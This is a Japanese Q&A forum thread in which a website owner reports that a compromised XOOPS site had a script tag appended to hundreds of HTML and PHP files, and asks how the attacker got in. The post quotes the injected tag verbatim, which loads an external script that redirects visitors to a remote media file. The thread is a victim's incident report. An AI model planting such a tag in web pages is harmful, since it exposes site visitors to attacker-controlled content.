こんにちは。
海外のレンタルサーバを借りてWebサイトを公開しているのですが、昨日ワームに感染したようでサイト内のほとんどのhtmlとphpファイルの行末に下記のjavascriptが挿入されていました。
<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>
このスクリプトで下記のWindowsMediaファイルにリダイレクトするようになっています。
.xungo.com/Elephant.wmv
ローカルPCからはウィルスやアドウェアは見つかっていません。
サーバ上のファイルの更新時間を見たところ1,2分の間に数百のファイルが書き換わっています。
アクセスログを調べていますが今の所、不審なアクセスを見つけられていません。
なにが原因で感染したのか知りたいのですが、手がかりになる情報をお持ちの方いらっしゃいますでしょうか?
下記のケースと同じようです。
http://66.102.7.104/search?q=cache:HNyQsvf-96oJ: …
ホスティング会社に問い合わせてますが、私のほうのセキュリティ問題だろうと言われて取り合えってもらえてません。
よろしくお願いします。
No.2ベストアンサー
- 回答日時:
不審なアクセスが無いとすれば、侵入されたということではないですか。
侵入者は、侵入してから一~二分で侵入の痕跡を削除し、物色。当然バックドアを何個か設置。
あとは自由に出入りする。
不審なアクセスが見つけられないことは、かなりの状態だと推定できますが。
この回答への補足
ご回答ありがとうございます。
分かったことですが、設置してあるxoopsのcasheディレクトリにinsert.phpというスクリプトが出来上がっており、それに対するアクセスログが1件ありました。
insert.phpの中身はhtmlファイルにjavascriptを挿入するための処理が入っていました。
ということで書き換えた手口はわかったのですが、
insert.phpがどういう形で作られたのか不明です。
xoopsのバージョンアップを怠っていたのでセキュリティが不十分だったと感じています。
お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!
似たような質問が見つかりました
- JavaScript javascriptで変数を組み込みたい 2 2023/01/13 09:52
- MySQL MySQL,JavaScript,PHPコードの結果を表示する方法を教えてください。 1 2023/02/13 17:49
- サーバー Laravelをレンタルサーバーにインストールするにはどうすればいいですか? 2 2022/06/29 10:17
- JavaScript jQueryでのドラッグアンドドロップについて 1 2022/07/07 21:04
- その他(IT・Webサービス) WEBサイト内のファイルを探す方法は? 1 2022/11/11 16:38
- JavaScript セレクトボックスを2つ設けて選択して初めてメッセを表示 1 2022/07/27 12:15
- PHP htmlspecialcharsが機能していないです。 バグですか? 1 2022/04/05 01:22
- JavaScript 入力フォームの javascript で メールアドレスの正規チェックをを行い、ボタンをクリックして 2 2022/04/27 16:06
- JavaScript フォームが空欄の時にフォームの外をクリックすると、エラーが出るコードを調べています。 1 2023/06/25 11:51
- AJAX JavascriptからPHPへのAjax通信でnullが返ってくる 3 2022/08/03 22:00
関連するカテゴリからQ&Aを探す
おすすめ情報
デイリーランキングこのカテゴリの人気デイリーQ&Aランキング
-
csvファイルを読み込み、該当項...
-
Win版IllustratorCS3でJavascri...
-
HTMLファイルに更新日時を自動...
-
ページを一回だけリロードさせ...
-
javascriptの効かないサーバー...
-
javascriptでエクセルデータ読...
-
正整数の半角数字かどうか判定する
-
JavaScriptでテキス...
-
「終了していない文字列型の定...
-
ASP(VBS) ←→ JavaScript の変数...
-
VB.NET2003 テキストボックスに...
-
Vba SelStart、SelLen教えてく...
-
JSPの処理の途中で、JavaScript...
-
Ajax以外で、JavaScriptからPHP...
-
「光の三原色」みたいな「三つ...
-
Javascriptエラーの原因が分か...
-
VBScript から JavaScript を呼...
-
初心者です。gulpでコンパイル...
-
C#でボタン名を変更しても動く
-
時間稼ぎの命令文とは?
マンスリーランキングこのカテゴリの人気マンスリーQ&Aランキング
-
htmlのfileタグに自動で値を入...
-
csvファイルを読み込み、該当項...
-
ページを一回だけリロードさせ...
-
テキストファイルの更新日時を取得
-
javascriptでエクセルデータ読...
-
JavascriptでのExcel起動について
-
javascriptでフォルダ内のファ...
-
外部ファイルからの値の取得
-
JAVAスクリプトで商品コードか...
-
JSでファイル数取得
-
contenteditableで編集した内容...
-
javascriptでJSONを取得する方法
-
jsファイルを閲覧者がダウンロ...
-
JavaScript(ライブラリ)のキ...
-
InDesign javascript について
-
IEから、ローカルマシンのTEXT...
-
Win版IllustratorCS3でJavascri...
-
フォルダ内のファイル一覧
-
ディレクトリにあるファイルの...
-
直下のディレクトリのファイル...
おすすめ情報